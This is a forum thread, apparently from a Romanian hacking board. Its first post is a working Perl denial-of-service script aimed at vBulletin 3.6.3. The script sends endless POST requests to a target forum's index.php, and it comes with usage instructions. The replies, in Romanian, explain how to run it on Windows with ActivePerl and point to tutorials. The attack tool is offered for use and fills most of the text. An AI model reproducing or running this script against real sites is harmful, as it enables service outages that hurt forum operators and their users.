Jump to content
trxtxx

vBulletin Denial of Service Vulnerability

Recommended Posts

Posted

#!/c:/perl/bin

#

# VBulletin Denail of Service Exploit by 4.!.5

#

# created : !N 7h3 DARKNESS

# CODED BY: R3d-D3V!L

#

# important => Image Verification in (search.php) is NOT Enabled.

# It tested on V3.6.3

#

#Perl Script

use Socket;

if (@ARGV < 2) { &usage }

$rand=rand(10);

$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg;

for ($i=0; $i<10; $i--)

{

$user="vb".$rand.$i;

$data = "s="

;

$len = length $data;

$foo = "POST ".$dir."index.php HTTP/1.1\r\n".

"Accept: */*\r\n".

"Accept-Language: en-gb\r\n".

"Content-Type: application/x-www-form-urlencoded\r\n".

"Accept-Encoding: gzip, deflate\r\n".

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".

"Host: $host\r\n".

"Content-Length: $len\r\n".

"Connection: Keep-Alive\r\n".

"Cache-Control: no-cache\r\n\r\n".

"$data";

my $port = "80";

my $proto = getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

send(SOCKET,"$foo", 0);

syswrite STDOUT, "+" ;

}

print "\n\n";

system('ping $host');

sub usage {

print "\tusage: \n";

print "\t$0 <host> </dir/>\n";

print "\tex: $0 127.0.0.1 /forum/\n";

print "\tex2: $0 127.0.0.1 /\n\n";

exit();

};

# Exploit By 4.!.5...

######################################################

Posted

da cand o sa fac rost de un linux ca am uitat incarcatorul la munte de la laptopul cu linux asa ca :) daca are cineva un linux la indemna sa faca un mic tutorial pt cine are nevoie.

edit: shit asta e in perl, fac tutorialul later:)

Posted

m-ai batut :) mai incearca sa reformulezi intrebarea ca nu inteleg ce vrei sa zici. presupun ca vrei sa zici cum folosesti scriptu asta pe windows? daca da trebe instalat live perl sau active perl cum draq se numeste dai pe google

active perl for windows si gasesti tu :)

Posted

# It tested on V3.6.3

normal ca nu merge pe alte versiuni mai noi . Pentru cine nu stie sa il folosesasca vedeti ca sunt tutoriale p'aici pe undeva . puneti mana si dait un search ..sau pe google

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...